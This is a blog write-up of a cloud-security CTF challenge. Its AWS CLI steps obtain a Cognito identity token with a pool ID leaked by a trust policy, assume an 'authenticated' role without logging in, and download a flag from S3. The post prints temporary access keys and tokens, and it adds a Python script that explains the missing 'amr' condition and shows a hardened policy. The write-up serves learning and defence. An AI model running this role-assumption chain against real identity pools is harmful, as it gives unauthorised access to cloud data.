
[The Big IAM Challenge] One final push

by Becoming a Hacker 2023. 7. 9.

One final push challenge

Description

Anonymous access no more. Let's see what you can do now. Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role

IAM Policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "cognito-identity.amazonaws.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
                }
            }
        }
    ]
}

Solution

This challenge only tells us that Cognito_s3accessAuth_Role exists, but considering the role name, it is likely that the flag is stored in S3.

Also, the condition in the trust policy reveals the cognito-identity aud value, so I judged that the challenge could be solved using that value.

Using that aud value, I obtained a Cognito OPEN ID TOKEN, used it to obtain temporary credentials, and downloaded the file in S3 to get the flag.

PoC

1. Apply the AWS environment variables from the web to my personal PC so that Cognito can be used

(I don't know why, but sts did not work properly in the web CLI, so I applied ACCESS_KEY, SECRET_KEY, SESSION_TOKEN, etc. on my personal PC via export and ran the commands there...)

PS> $Env:AWS_ACCESS_KEY_ID="ASIAZSFITKRS5LPKJTJQ"
PS> $Env:AWS_SECRET_ACCESS_KEY="g9OJ0Q3Z3YC5t4F6Qi5HjUg6UXm9yN0KRcndMH9K"
PS> $Env:AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEBYaCXVzLWVhc3QtMSJIMEYCIQDb9rIh2vIkg4T/Tn73KEKfxOHJTzBBwPFuNO6LDZcZGgIhAOTyQlw6PqkeNQoAtv0GbHRwd4HBnEEaEaNR7xo2GSWvKu8CCI///////////wEQABoMNjU3NDgzNTg0NjEzIgzH8JRdm+Cs4IiDhpYqwwKI3kBdCmirt4QlZK6dKGL5ySta98wACrdTvVvWFdzUgM5ALBv28yvr/v602NKZUSm8CHBSmWJNUZhx1ZNoxa0kKAHh9ijKtZtLBJPsJQQ09cJZ9NGx5GjWlIHPRKPZ9CiiTfIxgmSVACEXvFmHp8cuHo2VD8MxHQn2U1vhYxZnmGd1wOZ8wzhqhOf0GifShwt79Pk+Z+3s2c4w9jDoEFRrj5mxFyvQwDQcggVLOUoacp+31zea6yWiz53WFuYDjsTqL8hN6lc+jFPIB1HToGcyRMTtiiEw+7re9tVUlvjdm3SolVZ9J764SKn46K0+2qvJT9CpN7mfKk1hx92f/d9fdygpdXpysSse/CUIrjzdK/TgneDNGcZbBqhQVFZvabKSfNztBRMCyHt79NgrP0iyV/IRYJC6ltMEIEHa4oCdjKgyMjDA76qlBjqdAQYpCp2XJj0efDPCL45o1rEV2RFC1Ewz5v+eoEbGcSdU2gvJhCIq45mKFzbuM1vfb7sZxgXd/jovImUThZx2xU6VD7vPOIjLzZEUm1vFo4XNFnNxVyl7WIlFFHaqXjRf/zfvWy3tSOYTpy4Fg+qCcuvJW1xNpPW2zxRiXnCotldfgcqnIT3UpgOO7vzeowVVof2eJPY9qaFuBlvR2yM="

2. The aud in the IAM policy is the identity-pool-id; using that value, an IdentityId can be obtained

> aws cognito-identity get-id --region us-east-1 --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
{
    "IdentityId": "us-east-1:6c236592-4ba6-4bc8-b1d4-c3f9db2dc4f8"
}

3. Use the obtained IdentityId to receive an OPEN ID TOKEN

OPEN ID TOKEN: a JWT token that can be issued by Cognito; it typically has an expiry of 10 minutes

> aws cognito-identity get-open-id-token --region us-east-1 --identity-id us-east-1:6c236592-4ba6-4bc8-b1d4-c3f9db2dc4f8
{
    "IdentityId": "us-east-1:6c236592-4ba6-4bc8-b1d4-c3f9db2dc4f8",
    "Token": "eyJraWQiOiJ1cy1lYXN0LTEzIiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6NmMyMzY1OTItNGJhNi00YmM4LWIxZDQtYzNmOWRiMmRjNGY4IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE2ODg5MTIyNDUsImlhdCI6MTY4ODkxMTY0NX0.fJMlVkc3jRfbYXdAD8HB8unQKHiEaiRCjUQTI7rcu39dGoohlGFpBH6aYdDpAy__yycohwmKxKcEYGB5C63unJd_S73oEFcG0_NWe0aRz_SIK_Bz3CegYHGIcxgyv1qAqrw4agdfJgWyyiVUOUuNXe5OGdB7Ccp3bFq1j4rT4XrWrAHCajFMbbBGFSo7tYpaHl4ebfT2FoixpZB1GCdq0Ivh-Fzl8R8sXL9r0OZB9TfIUZlEx3z6sUGJFZnHTpMhmRBb_rDo4wtIUDXVfsV7KrAdk81nI849Qj1R7p4UMbKmCogzDufK_WlSvuEEoedkWRYjA-G-fD9AQ7nzPE0rWA"
}

4. Using the received OPEN ID TOKEN, temporary security credentials were issued via sts (Security Token Service)

> aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role" --role-session-name "Cognito_s3accessAuth_Role" --web-identity-token "eyJraWQiOiJ1cy1lYXN0LTEzIiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6NmMyMzY1OTItNGJhNi00YmM4LWIxZDQtYzNmOWRiMmRjNGY4IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE2ODg5MTIyNDUsImlhdCI6MTY4ODkxMTY0NX0.fJMlVkc3jRfbYXdAD8HB8unQKHiEaiRCjUQTI7rcu39dGoohlGFpBH6aYdDpAy__yycohwmKxKcEYGB5C63unJd_S73oEFcG0_NWe0aRz_SIK_Bz3CegYHGIcxgyv1qAqrw4agdfJgWyyiVUOUuNXe5OGdB7Ccp3bFq1j4rT4XrWrAHCajFMbbBGFSo7tYpaHl4ebfT2FoixpZB1GCdq0Ivh-Fzl8R8sXL9r0OZB9TfIUZlEx3z6sUGJFZnHTpMhmRBb_rDo4wtIUDXVfsV7KrAdk81nI849Qj1R7p4UMbKmCogzDufK_WlSvuEEoedkWRYjA-G-fD9AQ7nzPE0rWA"
{
    "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXK77S7HG6",
        "SecretAccessKey": "PW3ljgmORD0vbpSVvA+9Kc7B1D8KCKz1cOmc3iyd",
        "SessionToken": "<session token omitted>",
        "Expiration": "2023-07-09T15:07:45+00:00"
    },
    "SubjectFromWebIdentityToken": "us-east-1:6c236592-4ba6-4bc8-b1d4-c3f9db2dc4f8",
    "AssumedRoleUser": {
        "AssumedRoleId": "AROARK7LBOHXASFTNOIZG:Cognito_s3accessAuth_Role",
        "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/Cognito_s3accessAuth_Role"
    },
    "Provider": "cognito-identity.amazonaws.com",
    "Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}

5. Apply the temporary security credentials on my personal PC

PS> $Env:AWS_ACCESS_KEY_ID="ASIARK7LBOHXK77S7HG6"
PS> $Env:AWS_SECRET_ACCESS_KEY="PW3ljgmORD0vbpSVvA+9Kc7B1D8KCKz1cOmc3iyd"
PS> $Env:AWS_SESSION_TOKEN="<session token omitted>"

6. After checking the AWS S3 bucket list, download the file in the bucket to obtain the flag

> aws s3 ls
2023-06-07 01:32:38 tbic-wiz-analytics-bucket-b44867f
2023-06-07 01:35:10 thebigiamchallenge-admin-storage-abf1321
2023-06-05 22:14:20 thebigiamchallenge-storage-9979f4b
2023-06-05 22:28:31 wiz-privatefiles
2023-06-05 22:28:32 wiz-privatefiles-x1000
> aws s3 ls s3://wiz-privatefiles-x1000/
2023-06-06 04:42:27       4220 cognito2.png
2023-06-05 22:28:35         40 flag2.txt
> aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt ./
download: s3://wiz-privatefiles-x1000/flag2.txt to .\flag2.txt
> type flag2.txt
{wiz:open-sesame-or-shell-i-say-openid}
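Why the "authenticated" role was assumable without any login is visible in what the post already shows: the trust policy only checks cognito-identity.amazonaws.com:aud, and the token returned in step 3 carries "amr":["unauthenticated"]. The script below is an added example (mine, not code from the post or from the challenge authors): it decodes that token's claims (payload only, no signature verification, so it is inspection rather than validation), models the two IAM condition operators involved in a simplified evaluator that is not the real IAM engine, and compares the challenge's policy with a hardened variant that adds the ForAnyValue:StringLike condition on amr, which is the form the Cognito console generates for an authenticated role. The hardened policy is my own construction.

```python
"""Model how a Cognito identity-pool trust policy is evaluated (added example,
not from the post or the challenge). Only StringEquals and
ForAnyValue:StringLike on the cognito-identity.amazonaws.com:* keys are
modelled; this is a simplified IAM, not the real engine."""
import base64
import json
from fnmatch import fnmatchcase

# The JWT returned by get-open-id-token in step 3 (copied from the post; long
# expired). Only the payload is read; the signature is NOT verified, because
# the point is to see what Cognito encoded, not to trust the token.
PAGE_TOKEN = (
    "eyJraWQiOiJ1cy1lYXN0LTEzIiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ."
    "eyJzdWIiOiJ1cy1lYXN0LTE6NmMyMzY1OTItNGJhNi00YmM4LWIxZDQtYzNmOWRiMmRjNGY4IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE2ODg5MTIyNDUsImlhdCI6MTY4ODkxMTY0NX0."
    "fJMlVkc3jRfbYXdAD8HB8unQKHiEaiRCjUQTI7rcu39dGoohlGFpBH6aYdDpAy__yycohwmKxKcEYGB5C63unJd_S73oEFcG0_NWe0aRz_SIK_Bz3CegYHGIcxgyv1qAqrw4agdfJgWyyiVUOUuNXe5OGdB7Ccp3bFq1j4rT4XrWrAHCajFMbbBGFSo7tYpaHl4ebfT2FoixpZB1GCdq0Ivh-Fzl8R8sXL9r0OZB9TfIUZlEx3z6sUGJFZnHTpMhmRBb_rDo4wtIUDXVfsV7KrAdk81nI849Qj1R7p4UMbKmCogzDufK_WlSvuEEoedkWRYjA-G-fD9AQ7nzPE0rWA"
)

# Trust policy exactly as shown in the challenge: only the aud is checked.
CHALLENGE_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": "cognito-identity.amazonaws.com"},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {
            "StringEquals": {
                "cognito-identity.amazonaws.com:aud":
                    "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
            }
        },
    }],
}

# Hardened variant (my construction, not the challenge's): the extra amr
# condition is the form the Cognito console generates for an "authenticated"
# role, and it is exactly what the challenge policy lacks.
HARDENED_TRUST_POLICY = json.loads(json.dumps(CHALLENGE_TRUST_POLICY))
HARDENED_TRUST_POLICY["Statement"][0]["Condition"]["ForAnyValue:StringLike"] = {
    "cognito-identity.amazonaws.com:amr": "authenticated"
}

# Cognito condition keys and the token claim each one is populated from.
CONDITION_KEY_TO_CLAIM = {
    "cognito-identity.amazonaws.com:aud": "aud",
    "cognito-identity.amazonaws.com:amr": "amr",
}


def decode_jwt_payload(token):
    """Return the payload claims of a JWT as a dict (no signature check)."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)          # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _condition_holds(operator, key_values, claims):
    """Evaluate one condition block {key: expected} under one operator."""
    for key, expected in key_values.items():
        claim = CONDITION_KEY_TO_CLAIM.get(key)
        if claim is None or claim not in claims:
            return False                          # unknown or absent key
        actual, expected = _as_list(claims[claim]), _as_list(expected)
        if operator == "StringEquals":
            # Single-valued key: the claim must equal one of the listed values.
            if len(actual) != 1 or actual[0] not in expected:
                return False
        elif operator == "ForAnyValue:StringLike":
            # Multi-valued key: at least one claim value must match a pattern.
            if not any(fnmatchcase(a, e) for a in actual for e in expected):
                return False
        else:
            return False                          # operator outside this model
    return True


def can_assume(trust_policy, claims):
    """True if an Allow statement lets a Cognito identity with these claims
    call sts:AssumeRoleWithWebIdentity (Deny statements are not modelled)."""
    for stmt in trust_policy["Statement"]:
        if (stmt.get("Effect") == "Allow"
                and stmt.get("Principal", {}).get("Federated")
                == "cognito-identity.amazonaws.com"
                and "sts:AssumeRoleWithWebIdentity" in _as_list(stmt.get("Action"))
                and all(_condition_holds(op, kv, claims)
                        for op, kv in stmt.get("Condition", {}).items())):
            return True
    return False


def audit(token, trust_policy):
    """Summarise what the token proves and whether the policy accepts it."""
    claims = decode_jwt_payload(token)
    return {"amr": claims["amr"],
            "lifetime_seconds": claims["exp"] - claims["iat"],
            "allowed": can_assume(trust_policy, claims)}


if __name__ == "__main__":
    for name, policy in [("challenge", CHALLENGE_TRUST_POLICY),
                         ("hardened", HARDENED_TRUST_POLICY)]:
        print(name, audit(PAGE_TOKEN, policy))
```

Running it prints that the challenge policy accepts a token whose amr is ["unauthenticated"] while the hardened one rejects it, and that exp minus iat is 600 seconds, matching the 10-minute lifetime mentioned in step 3. When reviewing identity-pool roles, the check to make is the same: an "authenticated" role's trust policy needs both the aud condition and an amr condition, otherwise every guest identity in the pool can assume it.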

Reference

cognito-identity — AWS CLI 2.13.0 Command Reference (awscli.amazonaws.com)

assume-role-with-web-identity — AWS CLI 2.13.0 Command Reference (awscli.amazonaws.com)

Cognito Identity Pools - HackTricks Cloud (cloud.hacktricks.xyz)